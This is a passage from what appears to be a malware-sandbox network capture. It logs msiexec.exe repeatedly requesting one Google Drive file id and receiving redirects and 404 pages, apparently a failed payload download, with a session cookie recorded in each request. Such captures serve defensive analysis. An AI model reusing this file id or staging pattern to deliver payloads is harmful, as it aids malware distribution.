SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.9	49729	142.250.181.1	443	4516	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 15:44:36 UTC	460	OUT	GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
2024-12-03 15:44:37 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:44:37 GMT Content-Security-Policy: script-src 'nonce-5DhTH4YSDDw4HdM0PoGYsA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 X-GUploader-UploadID: AFiumC65Cln_I8TLMf4RVCfAT3Ygs_nejFlHeRcnrQGl_d_cP8989dOR8vXOvbrzzYRBG0VeE039mTIwaw Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 15:44:37 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 50 5f 46 70 79 65 4f 5a 70 55 6e 50 6c 50 73 77 50 37 68 7a 4b 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="P_FpyeOZpUnPlPswP7hzKQ">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.9	49730	172.217.19.174	443	4516	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 15:44:39 UTC	418	OUT	GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
2024-12-03 15:44:40 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:44:40 GMT Location: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'nonce-01YIFNOTPhBmC2FqqTZfEA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.9	49731	142.250.181.1	443	4516	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 15:44:42 UTC	460	OUT	GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
2024-12-03 15:44:43 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:44:42 GMT Content-Security-Policy: script-src 'nonce-Q2mJrjB3FJ-sa2acuUDKMw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 X-GUploader-UploadID: AFiumC4sgYGX8MDEjxSc-CtiXmNO-kkPq2NyrH84jAO_8C9qkiyyiyQ4dhpO4Wwe3Go5UG3Uu3Yx3RUV0A Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 15:44:43 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 76 50 37 68 30 56 77 5f 57 4c 55 4c 35 5a 4a 6d 31 48 71 42 73 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="vP7h0Vw_WLUL5ZJm1HqBsA">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.9	49732	172.217.19.174	443	4516	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 15:44:45 UTC	418	OUT	GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
2024-12-03 15:44:46 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:44:45 GMT Location: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-xHQ-CSLiLTrGw2K361n9Wg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.9	49733	142.250.181.1	443	4516	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 15:44:47 UTC	460	OUT	GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
2024-12-03 15:44:48 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:44:48 GMT Content-Security-Policy: script-src 'nonce-HhofEG0nNP6P9KUecNOClw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 X-GUploader-UploadID: AFiumC5WG4ekfceJreGtYog4yN3l62EE0uPVrr_utvRJmE3A4UAjFNZC4DvG1I3QUvMb_a9KC6ZVyZKK_Q Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 15:44:48 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 53 4f 56 77 62 37 42 4b 71 54 44 6e 35 4c 46 4e 31 44 31 43 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fSOVwb7BKqTDn5LFN1D1CQ">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.9	49734	172.217.19.174	443	4516	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 15:44:50 UTC	418	OUT	GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
2024-12-03 15:44:51 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:44:51 GMT Location: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-XpujJiISN93o5W_p8A-j_g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.9	49735	142.250.181.1	443	4516	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 15:44:53 UTC	460	OUT	GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
2024-12-03 15:44:54 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:44:53 GMT Content-Security-Policy: script-src 'nonce-L6Y-BSH-leork-yuznsohg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 X-GUploader-UploadID: AFiumC5zv0sc2tom8ulZKyxqIXmNLj5ofdZ2C9qHAwERI5s9nUEw0-cdDX1wN1fgk4sMpW5RGiaRolZ8ug Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 15:44:54 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 37 6b 6f 68 72 31 44 39 78 79 4b 2d 45 5f 57 70 2d 30 69 57 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="T7kohr1D9xyK-E_Wp-0iWA">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.9	49736	172.217.19.174	443	4516	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 15:44:56 UTC	418	OUT	GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
2024-12-03 15:44:57 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:44:56 GMT Location: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-MVbYlbPNe8diN_8OZL2fww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.9	49737	142.250.181.1	443	4516	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
